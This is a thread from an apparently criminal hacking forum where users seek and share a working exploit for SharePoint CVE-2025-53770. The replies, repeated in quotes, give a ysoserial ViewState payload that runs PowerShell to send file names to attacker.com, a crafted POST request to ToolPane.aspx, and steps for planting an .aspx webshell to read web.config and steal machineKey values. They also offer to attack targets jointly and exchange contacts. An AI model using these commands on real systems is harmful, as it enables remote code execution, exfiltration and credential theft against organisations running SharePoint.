• XSS.stack #1 – первый литературный журнал от юзеров форума

(Toolshell) CVE-2025-53770 Exploit?

Отслеживать

Knight

Largest Vendor
Premium
Регистрация
10.09.2024
Сообщения
180
Реакции
123
Гарант сделки
10
Депозит
0.0115
hello is there a working exploit for this CVE? I have tested the most popular ones, they don't work, which one do you have success with? or better yet a private one?

Привет, есть ли рабочий эксплойт для этой CVE? Я протестировал самые популярные, но они не работают. Какой из них вам помог? Или, ещё лучше, приватный?
 
have you tried using this?
https://github.com/soltanali0/CVE-2025-53770-Exploit

If that method didn’t work, try this one:

First, get the __VIEWSTATEGENERATOR value from the target SharePoint page:
Код: 
curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'

Then, create a PowerShell ViewState payload using ysoserial.exe that lists a directory on the server and sends the filenames to an external URL:

Код: 
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="<VIEWSTATE_GENERATOR>" \
--validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
--islegacy \
--minify

Finally, add the generated token to a POST request like this to execute the command on the server:

Код: 
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=<GENERATED_PAYLOAD>
 
blackhunt сказал(а):
have you tried using this?
https://github.com/soltanali0/CVE-2025-53770-Exploit

If that method didn’t work, try this one:

First, get the __VIEWSTATEGENERATOR value from the target SharePoint page:
Код: 
curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'

Then, create a PowerShell ViewState payload using ysoserial.exe that lists a directory on the server and sends the filenames to an external URL:

Код: 
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="<VIEWSTATE_GENERATOR>" \
--validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
--islegacy \
--minify

Finally, add the generated token to a POST request like this to execute the command on the server:

Код: 
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=<GENERATED_PAYLOAD>
Thanks for the Information! I'll try and let you know. Thanks again!
 
blackhunt сказал(а):
have you tried using this?
https://github.com/soltanali0/CVE-2025-53770-Exploit

If that method didn’t work, try this one:

First, get the __VIEWSTATEGENERATOR value from the target SharePoint page:
Код: 
curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'

Then, create a PowerShell ViewState payload using ysoserial.exe that lists a directory on the server and sends the filenames to an external URL:

Код: 
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="<VIEWSTATE_GENERATOR>" \
--validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
--islegacy \
--minify

Finally, add the generated token to a POST request like this to execute the command on the server:

Код: 
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=<GENERATED_PAYLOAD>
what about --validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
? how to get them?
 
on sharepoint, those only matter if you actually have the machinekey from the server without that, any ViewState you generate gets rejected the MAC check fails before anything runs how to get the key's? it’s straightforward:

1. upload an .aspx webshell (like spinstall0.aspx) to an executable path like /LAYOUTS/.

2. use it to read this file:

Код: 
C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\CONFIG\web.config

inside you’ll usually see something like:

Код: 
<machineKey
  validationKey="ABCDEF1237272727272..."
  validation="SHA1"
/>

take that, generate a signed ViewState using ysoserial.net, and inject it into a writable endpoint like /ToolPane.aspx if the MAC matches your payload executes. if you’ve got a sharepoint target, we can take a look at it together.
Knight
my jabber: blackhuntdev@exploit.im
 
blackhunt сказал(а):
on sharepoint, those only matter if you actually have the machinekey from the server without that, any ViewState you generate gets rejected the MAC check fails before anything runs how to get the key's? it’s straightforward:

1. upload an .aspx webshell (like spinstall0.aspx) to an executable path like /LAYOUTS/.

2. use it to read this file:

Код: 
C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\CONFIG\web.config

inside you’ll usually see something like:

Код: 
<machineKey
  validationKey="ABCDEF1237272727272..."
  validation="SHA1"
/>

take that, generate a signed ViewState using ysoserial.net, and inject it into a writable endpoint like /ToolPane.aspx if the MAC matches your payload executes. if you’ve got a sharepoint target, we can take a look at it together.
Knight
my jabber: blackhuntdev@exploit.im
TOX? if you have tox please leave it in forum messenger, or if unsafe on exploit.in my profile is NightRaider
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх